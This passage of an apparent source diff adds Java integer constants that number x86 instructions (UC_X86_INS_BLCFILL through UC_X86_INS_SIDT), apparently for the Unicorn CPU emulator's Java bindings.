static final int UC_X86_INS_BLCFILL = 33; + public static final int UC_X86_INS_BLCI = 34; + public static final int UC_X86_INS_BLCIC = 35; + public static final int UC_X86_INS_BLCMSK = 36; + public static final int UC_X86_INS_BLCS = 37; + public static final int UC_X86_INS_BLENDPD = 38; + public static final int UC_X86_INS_BLENDPS = 39; + public static final int UC_X86_INS_BLENDVPD = 40; + public static final int UC_X86_INS_BLENDVPS = 41; + public static final int UC_X86_INS_BLSFILL = 42; + public static final int UC_X86_INS_BLSI = 43; + public static final int UC_X86_INS_BLSIC = 44; + public static final int UC_X86_INS_BLSMSK = 45; + public static final int UC_X86_INS_BLSR = 46; + public static final int UC_X86_INS_BOUND = 47; + public static final int UC_X86_INS_BSF = 48; + public static final int UC_X86_INS_BSR = 49; + public static final int UC_X86_INS_BSWAP = 50; + public static final int UC_X86_INS_BT = 51; + public static final int UC_X86_INS_BTC = 52; + public static final int UC_X86_INS_BTR = 53; + public static final int UC_X86_INS_BTS = 54; + public static final int UC_X86_INS_BZHI = 55; + public static final int UC_X86_INS_CALL = 56; + public static final int UC_X86_INS_CBW = 57; + public static final int UC_X86_INS_CDQ = 58; + public static final int UC_X86_INS_CDQE = 59; + public static final int UC_X86_INS_FCHS = 60; + public static final int UC_X86_INS_CLAC = 61; + public static final int UC_X86_INS_CLC = 62; + public static final int UC_X86_INS_CLD = 63; + public static final int UC_X86_INS_CLFLUSH = 64; + public static final int UC_X86_INS_CLFLUSHOPT = 65; + public static final int UC_X86_INS_CLGI = 66; + public static final int UC_X86_INS_CLI = 67; + public static final int UC_X86_INS_CLTS = 68; + public static final int UC_X86_INS_CLWB = 69; + public static final int UC_X86_INS_CMC = 70; + public static final int UC_X86_INS_CMOVA = 71; + public static final int UC_X86_INS_CMOVAE = 72; + public static final int UC_X86_INS_CMOVB = 73; + public 
static final int UC_X86_INS_CMOVBE = 74; + public static final int UC_X86_INS_FCMOVBE = 75; + public static final int UC_X86_INS_FCMOVB = 76; + public static final int UC_X86_INS_CMOVE = 77; + public static final int UC_X86_INS_FCMOVE = 78; + public static final int UC_X86_INS_CMOVG = 79; + public static final int UC_X86_INS_CMOVGE = 80; + public static final int UC_X86_INS_CMOVL = 81; + public static final int UC_X86_INS_CMOVLE = 82; + public static final int UC_X86_INS_FCMOVNBE = 83; + public static final int UC_X86_INS_FCMOVNB = 84; + public static final int UC_X86_INS_CMOVNE = 85; + public static final int UC_X86_INS_FCMOVNE = 86; + public static final int UC_X86_INS_CMOVNO = 87; + public static final int UC_X86_INS_CMOVNP = 88; + public static final int UC_X86_INS_FCMOVNU = 89; + public static final int UC_X86_INS_CMOVNS = 90; + public static final int UC_X86_INS_CMOVO = 91; + public static final int UC_X86_INS_CMOVP = 92; + public static final int UC_X86_INS_FCMOVU = 93; + public static final int UC_X86_INS_CMOVS = 94; + public static final int UC_X86_INS_CMP = 95; + public static final int UC_X86_INS_CMPPD = 96; + public static final int UC_X86_INS_CMPPS = 97; + public static final int UC_X86_INS_CMPSB = 98; + public static final int UC_X86_INS_CMPSD = 99; + public static final int UC_X86_INS_CMPSQ = 100; + public static final int UC_X86_INS_CMPSS = 101; + public static final int UC_X86_INS_CMPSW = 102; + public static final int UC_X86_INS_CMPXCHG16B = 103; + public static final int UC_X86_INS_CMPXCHG = 104; + public static final int UC_X86_INS_CMPXCHG8B = 105; + public static final int UC_X86_INS_COMISD = 106; + public static final int UC_X86_INS_COMISS = 107; + public static final int UC_X86_INS_FCOMP = 108; + public static final int UC_X86_INS_FCOMPI = 109; + public static final int UC_X86_INS_FCOMI = 110; + public static final int UC_X86_INS_FCOM = 111; + public static final int UC_X86_INS_FCOS = 112; + public static final int UC_X86_INS_CPUID = 113; + 
public static final int UC_X86_INS_CQO = 114; + public static final int UC_X86_INS_CRC32 = 115; + public static final int UC_X86_INS_CVTDQ2PD = 116; + public static final int UC_X86_INS_CVTDQ2PS = 117; + public static final int UC_X86_INS_CVTPD2DQ = 118; + public static final int UC_X86_INS_CVTPD2PS = 119; + public static final int UC_X86_INS_CVTPS2DQ = 120; + public static final int UC_X86_INS_CVTPS2PD = 121; + public static final int UC_X86_INS_CVTSD2SI = 122; + public static final int UC_X86_INS_CVTSD2SS = 123; + public static final int UC_X86_INS_CVTSI2SD = 124; + public static final int UC_X86_INS_CVTSI2SS = 125; + public static final int UC_X86_INS_CVTSS2SD = 126; + public static final int UC_X86_INS_CVTSS2SI = 127; + public static final int UC_X86_INS_CVTTPD2DQ = 128; + public static final int UC_X86_INS_CVTTPS2DQ = 129; + public static final int UC_X86_INS_CVTTSD2SI = 130; + public static final int UC_X86_INS_CVTTSS2SI = 131; + public static final int UC_X86_INS_CWD = 132; + public static final int UC_X86_INS_CWDE = 133; + public static final int UC_X86_INS_DAA = 134; + public static final int UC_X86_INS_DAS = 135; + public static final int UC_X86_INS_DATA16 = 136; + public static final int UC_X86_INS_DEC = 137; + public static final int UC_X86_INS_DIV = 138; + public static final int UC_X86_INS_DIVPD = 139; + public static final int UC_X86_INS_DIVPS = 140; + public static final int UC_X86_INS_FDIVR = 141; + public static final int UC_X86_INS_FIDIVR = 142; + public static final int UC_X86_INS_FDIVRP = 143; + public static final int UC_X86_INS_DIVSD = 144; + public static final int UC_X86_INS_DIVSS = 145; + public static final int UC_X86_INS_FDIV = 146; + public static final int UC_X86_INS_FIDIV = 147; + public static final int UC_X86_INS_FDIVP = 148; + public static final int UC_X86_INS_DPPD = 149; + public static final int UC_X86_INS_DPPS = 150; + public static final int UC_X86_INS_RET = 151; + public static final int UC_X86_INS_ENCLS = 152; + public 
static final int UC_X86_INS_ENCLU = 153; + public static final int UC_X86_INS_ENTER = 154; + public static final int UC_X86_INS_EXTRACTPS = 155; + public static final int UC_X86_INS_EXTRQ = 156; + public static final int UC_X86_INS_F2XM1 = 157; + public static final int UC_X86_INS_LCALL = 158; + public static final int UC_X86_INS_LJMP = 159; + public static final int UC_X86_INS_FBLD = 160; + public static final int UC_X86_INS_FBSTP = 161; + public static final int UC_X86_INS_FCOMPP = 162; + public static final int UC_X86_INS_FDECSTP = 163; + public static final int UC_X86_INS_FEMMS = 164; + public static final int UC_X86_INS_FFREE = 165; + public static final int UC_X86_INS_FICOM = 166; + public static final int UC_X86_INS_FICOMP = 167; + public static final int UC_X86_INS_FINCSTP = 168; + public static final int UC_X86_INS_FLDCW = 169; + public static final int UC_X86_INS_FLDENV = 170; + public static final int UC_X86_INS_FLDL2E = 171; + public static final int UC_X86_INS_FLDL2T = 172; + public static final int UC_X86_INS_FLDLG2 = 173; + public static final int UC_X86_INS_FLDLN2 = 174; + public static final int UC_X86_INS_FLDPI = 175; + public static final int UC_X86_INS_FNCLEX = 176; + public static final int UC_X86_INS_FNINIT = 177; + public static final int UC_X86_INS_FNOP = 178; + public static final int UC_X86_INS_FNSTCW = 179; + public static final int UC_X86_INS_FNSTSW = 180; + public static final int UC_X86_INS_FPATAN = 181; + public static final int UC_X86_INS_FPREM = 182; + public static final int UC_X86_INS_FPREM1 = 183; + public static final int UC_X86_INS_FPTAN = 184; + public static final int UC_X86_INS_FFREEP = 185; + public static final int UC_X86_INS_FRNDINT = 186; + public static final int UC_X86_INS_FRSTOR = 187; + public static final int UC_X86_INS_FNSAVE = 188; + public static final int UC_X86_INS_FSCALE = 189; + public static final int UC_X86_INS_FSETPM = 190; + public static final int UC_X86_INS_FSINCOS = 191; + public static final int 
UC_X86_INS_FNSTENV = 192; + public static final int UC_X86_INS_FXAM = 193; + public static final int UC_X86_INS_FXRSTOR = 194; + public static final int UC_X86_INS_FXRSTOR64 = 195; + public static final int UC_X86_INS_FXSAVE = 196; + public static final int UC_X86_INS_FXSAVE64 = 197; + public static final int UC_X86_INS_FXTRACT = 198; + public static final int UC_X86_INS_FYL2X = 199; + public static final int UC_X86_INS_FYL2XP1 = 200; + public static final int UC_X86_INS_MOVAPD = 201; + public static final int UC_X86_INS_MOVAPS = 202; + public static final int UC_X86_INS_ORPD = 203; + public static final int UC_X86_INS_ORPS = 204; + public static final int UC_X86_INS_VMOVAPD = 205; + public static final int UC_X86_INS_VMOVAPS = 206; + public static final int UC_X86_INS_XORPD = 207; + public static final int UC_X86_INS_XORPS = 208; + public static final int UC_X86_INS_GETSEC = 209; + public static final int UC_X86_INS_HADDPD = 210; + public static final int UC_X86_INS_HADDPS = 211; + public static final int UC_X86_INS_HLT = 212; + public static final int UC_X86_INS_HSUBPD = 213; + public static final int UC_X86_INS_HSUBPS = 214; + public static final int UC_X86_INS_IDIV = 215; + public static final int UC_X86_INS_FILD = 216; + public static final int UC_X86_INS_IMUL = 217; + public static final int UC_X86_INS_IN = 218; + public static final int UC_X86_INS_INC = 219; + public static final int UC_X86_INS_INSB = 220; + public static final int UC_X86_INS_INSERTPS = 221; + public static final int UC_X86_INS_INSERTQ = 222; + public static final int UC_X86_INS_INSD = 223; + public static final int UC_X86_INS_INSW = 224; + public static final int UC_X86_INS_INT = 225; + public static final int UC_X86_INS_INT1 = 226; + public static final int UC_X86_INS_INT3 = 227; + public static final int UC_X86_INS_INTO = 228; + public static final int UC_X86_INS_INVD = 229; + public static final int UC_X86_INS_INVEPT = 230; + public static final int UC_X86_INS_INVLPG = 231; + public 
static final int UC_X86_INS_INVLPGA = 232; + public static final int UC_X86_INS_INVPCID = 233; + public static final int UC_X86_INS_INVVPID = 234; + public static final int UC_X86_INS_IRET = 235; + public static final int UC_X86_INS_IRETD = 236; + public static final int UC_X86_INS_IRETQ = 237; + public static final int UC_X86_INS_FISTTP = 238; + public static final int UC_X86_INS_FIST = 239; + public static final int UC_X86_INS_FISTP = 240; + public static final int UC_X86_INS_UCOMISD = 241; + public static final int UC_X86_INS_UCOMISS = 242; + public static final int UC_X86_INS_VCOMISD = 243; + public static final int UC_X86_INS_VCOMISS = 244; + public static final int UC_X86_INS_VCVTSD2SS = 245; + public static final int UC_X86_INS_VCVTSI2SD = 246; + public static final int UC_X86_INS_VCVTSI2SS = 247; + public static final int UC_X86_INS_VCVTSS2SD = 248; + public static final int UC_X86_INS_VCVTTSD2SI = 249; + public static final int UC_X86_INS_VCVTTSD2USI = 250; + public static final int UC_X86_INS_VCVTTSS2SI = 251; + public static final int UC_X86_INS_VCVTTSS2USI = 252; + public static final int UC_X86_INS_VCVTUSI2SD = 253; + public static final int UC_X86_INS_VCVTUSI2SS = 254; + public static final int UC_X86_INS_VUCOMISD = 255; + public static final int UC_X86_INS_VUCOMISS = 256; + public static final int UC_X86_INS_JAE = 257; + public static final int UC_X86_INS_JA = 258; + public static final int UC_X86_INS_JBE = 259; + public static final int UC_X86_INS_JB = 260; + public static final int UC_X86_INS_JCXZ = 261; + public static final int UC_X86_INS_JECXZ = 262; + public static final int UC_X86_INS_JE = 263; + public static final int UC_X86_INS_JGE = 264; + public static final int UC_X86_INS_JG = 265; + public static final int UC_X86_INS_JLE = 266; + public static final int UC_X86_INS_JL = 267; + public static final int UC_X86_INS_JMP = 268; + public static final int UC_X86_INS_JNE = 269; + public static final int UC_X86_INS_JNO = 270; + public static final 
int UC_X86_INS_JNP = 271; + public static final int UC_X86_INS_JNS = 272; + public static final int UC_X86_INS_JO = 273; + public static final int UC_X86_INS_JP = 274; + public static final int UC_X86_INS_JRCXZ = 275; + public static final int UC_X86_INS_JS = 276; + public static final int UC_X86_INS_KANDB = 277; + public static final int UC_X86_INS_KANDD = 278; + public static final int UC_X86_INS_KANDNB = 279; + public static final int UC_X86_INS_KANDND = 280; + public static final int UC_X86_INS_KANDNQ = 281; + public static final int UC_X86_INS_KANDNW = 282; + public static final int UC_X86_INS_KANDQ = 283; + public static final int UC_X86_INS_KANDW = 284; + public static final int UC_X86_INS_KMOVB = 285; + public static final int UC_X86_INS_KMOVD = 286; + public static final int UC_X86_INS_KMOVQ = 287; + public static final int UC_X86_INS_KMOVW = 288; + public static final int UC_X86_INS_KNOTB = 289; + public static final int UC_X86_INS_KNOTD = 290; + public static final int UC_X86_INS_KNOTQ = 291; + public static final int UC_X86_INS_KNOTW = 292; + public static final int UC_X86_INS_KORB = 293; + public static final int UC_X86_INS_KORD = 294; + public static final int UC_X86_INS_KORQ = 295; + public static final int UC_X86_INS_KORTESTB = 296; + public static final int UC_X86_INS_KORTESTD = 297; + public static final int UC_X86_INS_KORTESTQ = 298; + public static final int UC_X86_INS_KORTESTW = 299; + public static final int UC_X86_INS_KORW = 300; + public static final int UC_X86_INS_KSHIFTLB = 301; + public static final int UC_X86_INS_KSHIFTLD = 302; + public static final int UC_X86_INS_KSHIFTLQ = 303; + public static final int UC_X86_INS_KSHIFTLW = 304; + public static final int UC_X86_INS_KSHIFTRB = 305; + public static final int UC_X86_INS_KSHIFTRD = 306; + public static final int UC_X86_INS_KSHIFTRQ = 307; + public static final int UC_X86_INS_KSHIFTRW = 308; + public static final int UC_X86_INS_KUNPCKBW = 309; + public static final int UC_X86_INS_KXNORB = 
310; + public static final int UC_X86_INS_KXNORD = 311; + public static final int UC_X86_INS_KXNORQ = 312; + public static final int UC_X86_INS_KXNORW = 313; + public static final int UC_X86_INS_KXORB = 314; + public static final int UC_X86_INS_KXORD = 315; + public static final int UC_X86_INS_KXORQ = 316; + public static final int UC_X86_INS_KXORW = 317; + public static final int UC_X86_INS_LAHF = 318; + public static final int UC_X86_INS_LAR = 319; + public static final int UC_X86_INS_LDDQU = 320; + public static final int UC_X86_INS_LDMXCSR = 321; + public static final int UC_X86_INS_LDS = 322; + public static final int UC_X86_INS_FLDZ = 323; + public static final int UC_X86_INS_FLD1 = 324; + public static final int UC_X86_INS_FLD = 325; + public static final int UC_X86_INS_LEA = 326; + public static final int UC_X86_INS_LEAVE = 327; + public static final int UC_X86_INS_LES = 328; + public static final int UC_X86_INS_LFENCE = 329; + public static final int UC_X86_INS_LFS = 330; + public static final int UC_X86_INS_LGDT = 331; + public static final int UC_X86_INS_LGS = 332; + public static final int UC_X86_INS_LIDT = 333; + public static final int UC_X86_INS_LLDT = 334; + public static final int UC_X86_INS_LMSW = 335; + public static final int UC_X86_INS_OR = 336; + public static final int UC_X86_INS_SUB = 337; + public static final int UC_X86_INS_XOR = 338; + public static final int UC_X86_INS_LODSB = 339; + public static final int UC_X86_INS_LODSD = 340; + public static final int UC_X86_INS_LODSQ = 341; + public static final int UC_X86_INS_LODSW = 342; + public static final int UC_X86_INS_LOOP = 343; + public static final int UC_X86_INS_LOOPE = 344; + public static final int UC_X86_INS_LOOPNE = 345; + public static final int UC_X86_INS_RETF = 346; + public static final int UC_X86_INS_RETFQ = 347; + public static final int UC_X86_INS_LSL = 348; + public static final int UC_X86_INS_LSS = 349; + public static final int UC_X86_INS_LTR = 350; + public static final 
int UC_X86_INS_XADD = 351; + public static final int UC_X86_INS_LZCNT = 352; + public static final int UC_X86_INS_MASKMOVDQU = 353; + public static final int UC_X86_INS_MAXPD = 354; + public static final int UC_X86_INS_MAXPS = 355; + public static final int UC_X86_INS_MAXSD = 356; + public static final int UC_X86_INS_MAXSS = 357; + public static final int UC_X86_INS_MFENCE = 358; + public static final int UC_X86_INS_MINPD = 359; + public static final int UC_X86_INS_MINPS = 360; + public static final int UC_X86_INS_MINSD = 361; + public static final int UC_X86_INS_MINSS = 362; + public static final int UC_X86_INS_CVTPD2PI = 363; + public static final int UC_X86_INS_CVTPI2PD = 364; + public static final int UC_X86_INS_CVTPI2PS = 365; + public static final int UC_X86_INS_CVTPS2PI = 366; + public static final int UC_X86_INS_CVTTPD2PI = 367; + public static final int UC_X86_INS_CVTTPS2PI = 368; + public static final int UC_X86_INS_EMMS = 369; + public static final int UC_X86_INS_MASKMOVQ = 370; + public static final int UC_X86_INS_MOVD = 371; + public static final int UC_X86_INS_MOVDQ2Q = 372; + public static final int UC_X86_INS_MOVNTQ = 373; + public static final int UC_X86_INS_MOVQ2DQ = 374; + public static final int UC_X86_INS_MOVQ = 375; + public static final int UC_X86_INS_PABSB = 376; + public static final int UC_X86_INS_PABSD = 377; + public static final int UC_X86_INS_PABSW = 378; + public static final int UC_X86_INS_PACKSSDW = 379; + public static final int UC_X86_INS_PACKSSWB = 380; + public static final int UC_X86_INS_PACKUSWB = 381; + public static final int UC_X86_INS_PADDB = 382; + public static final int UC_X86_INS_PADDD = 383; + public static final int UC_X86_INS_PADDQ = 384; + public static final int UC_X86_INS_PADDSB = 385; + public static final int UC_X86_INS_PADDSW = 386; + public static final int UC_X86_INS_PADDUSB = 387; + public static final int UC_X86_INS_PADDUSW = 388; + public static final int UC_X86_INS_PADDW = 389; + public static final int 
UC_X86_INS_PALIGNR = 390; + public static final int UC_X86_INS_PANDN = 391; + public static final int UC_X86_INS_PAND = 392; + public static final int UC_X86_INS_PAVGB = 393; + public static final int UC_X86_INS_PAVGW = 394; + public static final int UC_X86_INS_PCMPEQB = 395; + public static final int UC_X86_INS_PCMPEQD = 396; + public static final int UC_X86_INS_PCMPEQW = 397; + public static final int UC_X86_INS_PCMPGTB = 398; + public static final int UC_X86_INS_PCMPGTD = 399; + public static final int UC_X86_INS_PCMPGTW = 400; + public static final int UC_X86_INS_PEXTRW = 401; + public static final int UC_X86_INS_PHADDSW = 402; + public static final int UC_X86_INS_PHADDW = 403; + public static final int UC_X86_INS_PHADDD = 404; + public static final int UC_X86_INS_PHSUBD = 405; + public static final int UC_X86_INS_PHSUBSW = 406; + public static final int UC_X86_INS_PHSUBW = 407; + public static final int UC_X86_INS_PINSRW = 408; + public static final int UC_X86_INS_PMADDUBSW = 409; + public static final int UC_X86_INS_PMADDWD = 410; + public static final int UC_X86_INS_PMAXSW = 411; + public static final int UC_X86_INS_PMAXUB = 412; + public static final int UC_X86_INS_PMINSW = 413; + public static final int UC_X86_INS_PMINUB = 414; + public static final int UC_X86_INS_PMOVMSKB = 415; + public static final int UC_X86_INS_PMULHRSW = 416; + public static final int UC_X86_INS_PMULHUW = 417; + public static final int UC_X86_INS_PMULHW = 418; + public static final int UC_X86_INS_PMULLW = 419; + public static final int UC_X86_INS_PMULUDQ = 420; + public static final int UC_X86_INS_POR = 421; + public static final int UC_X86_INS_PSADBW = 422; + public static final int UC_X86_INS_PSHUFB = 423; + public static final int UC_X86_INS_PSHUFW = 424; + public static final int UC_X86_INS_PSIGNB = 425; + public static final int UC_X86_INS_PSIGND = 426; + public static final int UC_X86_INS_PSIGNW = 427; + public static final int UC_X86_INS_PSLLD = 428; + public static final int 
UC_X86_INS_PSLLQ = 429; + public static final int UC_X86_INS_PSLLW = 430; + public static final int UC_X86_INS_PSRAD = 431; + public static final int UC_X86_INS_PSRAW = 432; + public static final int UC_X86_INS_PSRLD = 433; + public static final int UC_X86_INS_PSRLQ = 434; + public static final int UC_X86_INS_PSRLW = 435; + public static final int UC_X86_INS_PSUBB = 436; + public static final int UC_X86_INS_PSUBD = 437; + public static final int UC_X86_INS_PSUBQ = 438; + public static final int UC_X86_INS_PSUBSB = 439; + public static final int UC_X86_INS_PSUBSW = 440; + public static final int UC_X86_INS_PSUBUSB = 441; + public static final int UC_X86_INS_PSUBUSW = 442; + public static final int UC_X86_INS_PSUBW = 443; + public static final int UC_X86_INS_PUNPCKHBW = 444; + public static final int UC_X86_INS_PUNPCKHDQ = 445; + public static final int UC_X86_INS_PUNPCKHWD = 446; + public static final int UC_X86_INS_PUNPCKLBW = 447; + public static final int UC_X86_INS_PUNPCKLDQ = 448; + public static final int UC_X86_INS_PUNPCKLWD = 449; + public static final int UC_X86_INS_PXOR = 450; + public static final int UC_X86_INS_MONITOR = 451; + public static final int UC_X86_INS_MONTMUL = 452; + public static final int UC_X86_INS_MOV = 453; + public static final int UC_X86_INS_MOVABS = 454; + public static final int UC_X86_INS_MOVBE = 455; + public static final int UC_X86_INS_MOVDDUP = 456; + public static final int UC_X86_INS_MOVDQA = 457; + public static final int UC_X86_INS_MOVDQU = 458; + public static final int UC_X86_INS_MOVHLPS = 459; + public static final int UC_X86_INS_MOVHPD = 460; + public static final int UC_X86_INS_MOVHPS = 461; + public static final int UC_X86_INS_MOVLHPS = 462; + public static final int UC_X86_INS_MOVLPD = 463; + public static final int UC_X86_INS_MOVLPS = 464; + public static final int UC_X86_INS_MOVMSKPD = 465; + public static final int UC_X86_INS_MOVMSKPS = 466; + public static final int UC_X86_INS_MOVNTDQA = 467; + public static final 
int UC_X86_INS_MOVNTDQ = 468; + public static final int UC_X86_INS_MOVNTI = 469; + public static final int UC_X86_INS_MOVNTPD = 470; + public static final int UC_X86_INS_MOVNTPS = 471; + public static final int UC_X86_INS_MOVNTSD = 472; + public static final int UC_X86_INS_MOVNTSS = 473; + public static final int UC_X86_INS_MOVSB = 474; + public static final int UC_X86_INS_MOVSD = 475; + public static final int UC_X86_INS_MOVSHDUP = 476; + public static final int UC_X86_INS_MOVSLDUP = 477; + public static final int UC_X86_INS_MOVSQ = 478; + public static final int UC_X86_INS_MOVSS = 479; + public static final int UC_X86_INS_MOVSW = 480; + public static final int UC_X86_INS_MOVSX = 481; + public static final int UC_X86_INS_MOVSXD = 482; + public static final int UC_X86_INS_MOVUPD = 483; + public static final int UC_X86_INS_MOVUPS = 484; + public static final int UC_X86_INS_MOVZX = 485; + public static final int UC_X86_INS_MPSADBW = 486; + public static final int UC_X86_INS_MUL = 487; + public static final int UC_X86_INS_MULPD = 488; + public static final int UC_X86_INS_MULPS = 489; + public static final int UC_X86_INS_MULSD = 490; + public static final int UC_X86_INS_MULSS = 491; + public static final int UC_X86_INS_MULX = 492; + public static final int UC_X86_INS_FMUL = 493; + public static final int UC_X86_INS_FIMUL = 494; + public static final int UC_X86_INS_FMULP = 495; + public static final int UC_X86_INS_MWAIT = 496; + public static final int UC_X86_INS_NEG = 497; + public static final int UC_X86_INS_NOP = 498; + public static final int UC_X86_INS_NOT = 499; + public static final int UC_X86_INS_OUT = 500; + public static final int UC_X86_INS_OUTSB = 501; + public static final int UC_X86_INS_OUTSD = 502; + public static final int UC_X86_INS_OUTSW = 503; + public static final int UC_X86_INS_PACKUSDW = 504; + public static final int UC_X86_INS_PAUSE = 505; + public static final int UC_X86_INS_PAVGUSB = 506; + public static final int UC_X86_INS_PBLENDVB = 507; + 
public static final int UC_X86_INS_PBLENDW = 508; + public static final int UC_X86_INS_PCLMULQDQ = 509; + public static final int UC_X86_INS_PCMPEQQ = 510; + public static final int UC_X86_INS_PCMPESTRI = 511; + public static final int UC_X86_INS_PCMPESTRM = 512; + public static final int UC_X86_INS_PCMPGTQ = 513; + public static final int UC_X86_INS_PCMPISTRI = 514; + public static final int UC_X86_INS_PCMPISTRM = 515; + public static final int UC_X86_INS_PCOMMIT = 516; + public static final int UC_X86_INS_PDEP = 517; + public static final int UC_X86_INS_PEXT = 518; + public static final int UC_X86_INS_PEXTRB = 519; + public static final int UC_X86_INS_PEXTRD = 520; + public static final int UC_X86_INS_PEXTRQ = 521; + public static final int UC_X86_INS_PF2ID = 522; + public static final int UC_X86_INS_PF2IW = 523; + public static final int UC_X86_INS_PFACC = 524; + public static final int UC_X86_INS_PFADD = 525; + public static final int UC_X86_INS_PFCMPEQ = 526; + public static final int UC_X86_INS_PFCMPGE = 527; + public static final int UC_X86_INS_PFCMPGT = 528; + public static final int UC_X86_INS_PFMAX = 529; + public static final int UC_X86_INS_PFMIN = 530; + public static final int UC_X86_INS_PFMUL = 531; + public static final int UC_X86_INS_PFNACC = 532; + public static final int UC_X86_INS_PFPNACC = 533; + public static final int UC_X86_INS_PFRCPIT1 = 534; + public static final int UC_X86_INS_PFRCPIT2 = 535; + public static final int UC_X86_INS_PFRCP = 536; + public static final int UC_X86_INS_PFRSQIT1 = 537; + public static final int UC_X86_INS_PFRSQRT = 538; + public static final int UC_X86_INS_PFSUBR = 539; + public static final int UC_X86_INS_PFSUB = 540; + public static final int UC_X86_INS_PHMINPOSUW = 541; + public static final int UC_X86_INS_PI2FD = 542; + public static final int UC_X86_INS_PI2FW = 543; + public static final int UC_X86_INS_PINSRB = 544; + public static final int UC_X86_INS_PINSRD = 545; + public static final int UC_X86_INS_PINSRQ 
= 546; + public static final int UC_X86_INS_PMAXSB = 547; + public static final int UC_X86_INS_PMAXSD = 548; + public static final int UC_X86_INS_PMAXUD = 549; + public static final int UC_X86_INS_PMAXUW = 550; + public static final int UC_X86_INS_PMINSB = 551; + public static final int UC_X86_INS_PMINSD = 552; + public static final int UC_X86_INS_PMINUD = 553; + public static final int UC_X86_INS_PMINUW = 554; + public static final int UC_X86_INS_PMOVSXBD = 555; + public static final int UC_X86_INS_PMOVSXBQ = 556; + public static final int UC_X86_INS_PMOVSXBW = 557; + public static final int UC_X86_INS_PMOVSXDQ = 558; + public static final int UC_X86_INS_PMOVSXWD = 559; + public static final int UC_X86_INS_PMOVSXWQ = 560; + public static final int UC_X86_INS_PMOVZXBD = 561; + public static final int UC_X86_INS_PMOVZXBQ = 562; + public static final int UC_X86_INS_PMOVZXBW = 563; + public static final int UC_X86_INS_PMOVZXDQ = 564; + public static final int UC_X86_INS_PMOVZXWD = 565; + public static final int UC_X86_INS_PMOVZXWQ = 566; + public static final int UC_X86_INS_PMULDQ = 567; + public static final int UC_X86_INS_PMULHRW = 568; + public static final int UC_X86_INS_PMULLD = 569; + public static final int UC_X86_INS_POP = 570; + public static final int UC_X86_INS_POPAW = 571; + public static final int UC_X86_INS_POPAL = 572; + public static final int UC_X86_INS_POPCNT = 573; + public static final int UC_X86_INS_POPF = 574; + public static final int UC_X86_INS_POPFD = 575; + public static final int UC_X86_INS_POPFQ = 576; + public static final int UC_X86_INS_PREFETCH = 577; + public static final int UC_X86_INS_PREFETCHNTA = 578; + public static final int UC_X86_INS_PREFETCHT0 = 579; + public static final int UC_X86_INS_PREFETCHT1 = 580; + public static final int UC_X86_INS_PREFETCHT2 = 581; + public static final int UC_X86_INS_PREFETCHW = 582; + public static final int UC_X86_INS_PSHUFD = 583; + public static final int UC_X86_INS_PSHUFHW = 584; + public static 
final int UC_X86_INS_PSHUFLW = 585; + public static final int UC_X86_INS_PSLLDQ = 586; + public static final int UC_X86_INS_PSRLDQ = 587; + public static final int UC_X86_INS_PSWAPD = 588; + public static final int UC_X86_INS_PTEST = 589; + public static final int UC_X86_INS_PUNPCKHQDQ = 590; + public static final int UC_X86_INS_PUNPCKLQDQ = 591; + public static final int UC_X86_INS_PUSH = 592; + public static final int UC_X86_INS_PUSHAW = 593; + public static final int UC_X86_INS_PUSHAL = 594; + public static final int UC_X86_INS_PUSHF = 595; + public static final int UC_X86_INS_PUSHFD = 596; + public static final int UC_X86_INS_PUSHFQ = 597; + public static final int UC_X86_INS_RCL = 598; + public static final int UC_X86_INS_RCPPS = 599; + public static final int UC_X86_INS_RCPSS = 600; + public static final int UC_X86_INS_RCR = 601; + public static final int UC_X86_INS_RDFSBASE = 602; + public static final int UC_X86_INS_RDGSBASE = 603; + public static final int UC_X86_INS_RDMSR = 604; + public static final int UC_X86_INS_RDPMC = 605; + public static final int UC_X86_INS_RDRAND = 606; + public static final int UC_X86_INS_RDSEED = 607; + public static final int UC_X86_INS_RDTSC = 608; + public static final int UC_X86_INS_RDTSCP = 609; + public static final int UC_X86_INS_ROL = 610; + public static final int UC_X86_INS_ROR = 611; + public static final int UC_X86_INS_RORX = 612; + public static final int UC_X86_INS_ROUNDPD = 613; + public static final int UC_X86_INS_ROUNDPS = 614; + public static final int UC_X86_INS_ROUNDSD = 615; + public static final int UC_X86_INS_ROUNDSS = 616; + public static final int UC_X86_INS_RSM = 617; + public static final int UC_X86_INS_RSQRTPS = 618; + public static final int UC_X86_INS_RSQRTSS = 619; + public static final int UC_X86_INS_SAHF = 620; + public static final int UC_X86_INS_SAL = 621; + public static final int UC_X86_INS_SALC = 622; + public static final int UC_X86_INS_SAR = 623; + public static final int UC_X86_INS_SARX = 
624; + public static final int UC_X86_INS_SBB = 625; + public static final int UC_X86_INS_SCASB = 626; + public static final int UC_X86_INS_SCASD = 627; + public static final int UC_X86_INS_SCASQ = 628; + public static final int UC_X86_INS_SCASW = 629; + public static final int UC_X86_INS_SETAE = 630; + public static final int UC_X86_INS_SETA = 631; + public static final int UC_X86_INS_SETBE = 632; + public static final int UC_X86_INS_SETB = 633; + public static final int UC_X86_INS_SETE = 634; + public static final int UC_X86_INS_SETGE = 635; + public static final int UC_X86_INS_SETG = 636; + public static final int UC_X86_INS_SETLE = 637; + public static final int UC_X86_INS_SETL = 638; + public static final int UC_X86_INS_SETNE = 639; + public static final int UC_X86_INS_SETNO = 640; + public static final int UC_X86_INS_SETNP = 641; + public static final int UC_X86_INS_SETNS = 642; + public static final int UC_X86_INS_SETO = 643; + public static final int UC_X86_INS_SETP = 644; + public static final int UC_X86_INS_SETS = 645; + public static final int UC_X86_INS_SFENCE = 646; + public static final int UC_X86_INS_SGDT = 647; + public static final int UC_X86_INS_SHA1MSG1 = 648; + public static final int UC_X86_INS_SHA1MSG2 = 649; + public static final int UC_X86_INS_SHA1NEXTE = 650; + public static final int UC_X86_INS_SHA1RNDS4 = 651; + public static final int UC_X86_INS_SHA256MSG1 = 652; + public static final int UC_X86_INS_SHA256MSG2 = 653; + public static final int UC_X86_INS_SHA256RNDS2 = 654; + public static final int UC_X86_INS_SHL = 655; + public static final int UC_X86_INS_SHLD = 656; + public static final int UC_X86_INS_SHLX = 657; + public static final int UC_X86_INS_SHR = 658; + public static final int UC_X86_INS_SHRD = 659; + public static final int UC_X86_INS_SHRX = 660; + public static final int UC_X86_INS_SHUFPD = 661; + public static final int UC_X86_INS_SHUFPS = 662; + public static final int UC_X86_INS_SIDT = 663; + public static final int 
